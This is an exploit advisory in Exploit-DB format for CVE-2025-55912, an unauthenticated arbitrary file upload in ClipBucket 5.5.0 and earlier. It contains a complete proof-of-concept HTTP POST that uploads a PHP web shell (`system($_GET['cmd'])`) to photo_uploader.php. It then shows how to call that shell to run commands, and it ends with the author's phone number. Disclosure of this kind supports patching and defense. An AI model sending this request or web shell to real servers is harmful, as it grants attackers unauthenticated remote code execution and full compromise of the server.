# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload
# Google Dork: N/A
# Date: 2025-09-11
# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
# Vendor Homepage: https://clipbucket.com
# Software Link: https://github.com/MacWarrior/clipbucket-v5
# Version: <= 5.5.0
# Tested on: Ubuntu 20.04 LTS, PHP 7.4
# CVE: CVE-2025-55912
## Vulnerability Description:
ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload
vulnerability in `upload/actions/photo_uploader.php`. Missing access
controls and insufficient validation of uploaded files allow an attacker to
upload a crafted PHP file and execute it remotely, leading to full remote
code execution (RCE).
## PoC Request:
POST /upload/actions/photo_uploader.php HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data; boundary=----BOUND
------BOUND
Content-Disposition: form-data; name="Filedata"; filename="shell.php"
Content-Type: application/x-php
<?php system($_GET['cmd']); ?>
------BOUND--
The file is uploaded without authentication. The attacker can then access
it:
http://victim.com/files/photos/shell.php?cmd=id
## Impact:
- Unauthenticated remote code execution (RCE)
- Full compromise of target application and underlying server
Regards,
Mukundsinh Solanki
+916355251151
